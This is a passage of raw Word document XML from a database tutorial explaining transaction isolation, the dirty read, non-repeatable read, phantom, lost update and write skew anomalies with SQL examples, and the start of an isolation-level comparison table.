        <w:t xml:space="preserve">  Application bugs can't violate database-level constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879FC2C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="549597BC">
          <v:rect id="_x0000_i6697" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBDD27" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Isolation — Concurrent Transaction Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F011B6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4465C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Each transaction executes as if it were the ONLY transaction running. Concurrent transactions don't see each other's intermediate (uncommitted) states, and the final result is the same as if transactions ran one at a time (serially).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C300E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why isolation is the hardest property:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C7402" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B5248" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Without isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25108107" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T1: Read balance(Alice) = 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532C077" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T2: Read balance(Alice) = 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E3D52" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T1: Write balance(Alice) = 500 - 100 = 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48532D15" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T2: Write balance(Alice) = 500 - 200 = 300   ← T2 overwrites T1's debit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F5649B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16217051" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Expected final: 500 - 100 - 200 = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE9D62" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Actual: 300 (lost T1's update — "lost update" anomaly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464876CB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65021A71" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>With isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD52F2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  T1 and T2 appear to run serially (one after the other).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623C4FD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Result: 500 - 100 - 200 = 200 (correct regardless of ordering).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4548E4CB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Isolation Anomalies (What Goes Wrong Without Full Isolation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E1325" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dirty Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B12C49" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FCCF0D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: UPDATE accounts SET balance = 400 WHERE id = 'Alice';  (not yet committed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579FFA17" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: SELECT balance FROM accounts WHERE id = 'Alice';  → reads 400 (uncommitted!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A326D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: ROLLBACK;  (Alice's balance is still 500)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D52EB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="7EE2DA9B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2 read a value that NEVER EXISTED in the committed database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE97952" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2 made decisions based on phantom data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0394D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Non-Repeatable Read (Read Skew):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2702F1C7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702189D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT balance FROM accounts WHERE id = 'Alice';  → 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66771726" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: UPDATE accounts SET balance = 400 WHERE id = 'Alice'; COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFFE07" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT balance FROM accounts WHERE id = 'Alice';  → 400 (different!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D80F144" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="16B48351" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Same query, same transaction, different results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E7B17" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1's view of the world changed mid-transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64F1D3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phantom Read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E2F01" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087DFCE1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT COUNT(*) FROM orders WHERE status = 'pending';  → 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645AEA1A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>T2: INSERT INTO orders (status) VALUES ('pending'); COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3C14A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: SELECT COUNT(*) FROM orders WHERE status = 'pending';  → 6 (new row appeared!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAADF30" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="72413430" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>A NEW row appeared that matches T1's query (phantom).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C0A1A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Different from non-repeatable read: it's a new row, not a changed row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139C5A3E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lost Update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703ECB58" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340BF278" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: Read counter = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961B70A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: Read counter = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7E57B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: Write counter = 10 + 1 = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB7A45" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: Write counter = 10 + 1 = 11   ← should be 12!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE9A0F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="042907FF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Both read the same value, both increment, one increment is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35246D3F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write Skew:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517FD8C9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC7B20" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Invariant: At least one doctor must be on call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC47E0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Currently: Alice on-call=true, Bob on-call=true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E40A1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="1AE23BAE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T1: Check "Is there another doctor on call?" → Yes (Bob). Set Alice off-call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741837DB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>T2: Check "Is there another doctor on call?" → Yes (Alice). Set Bob off-call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023CEDB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="58C3A2F7" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Both commit. Result: NOBODY is on call. Invariant violated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FBDC9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Neither transaction individually violates the constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230C2FA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>But together they create an invalid state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4CD70" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Isolation Levels (The Tradeoff Spectrum)</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23"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1380"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1213"/>
        <w:gridCol w:w="1508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="3EEB073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39E248" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Level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AABE85" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Dirty Read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5BD068" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Non-Repeatable Read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56E252" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Phantom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355B00" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Lost Update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F0E877" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Write Skew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12F26D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="251E231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812EC9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Read Uncommitted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ECB261" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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841984" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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D3B478" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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BF3F6D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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F11EA6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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31AF47" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Fastest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="338173C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3408CA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Read Committed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41D70B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>✓ Prevented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E39A88" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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AC55EE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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69757C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t xml:space="preserve"> Possible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CCF0CA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
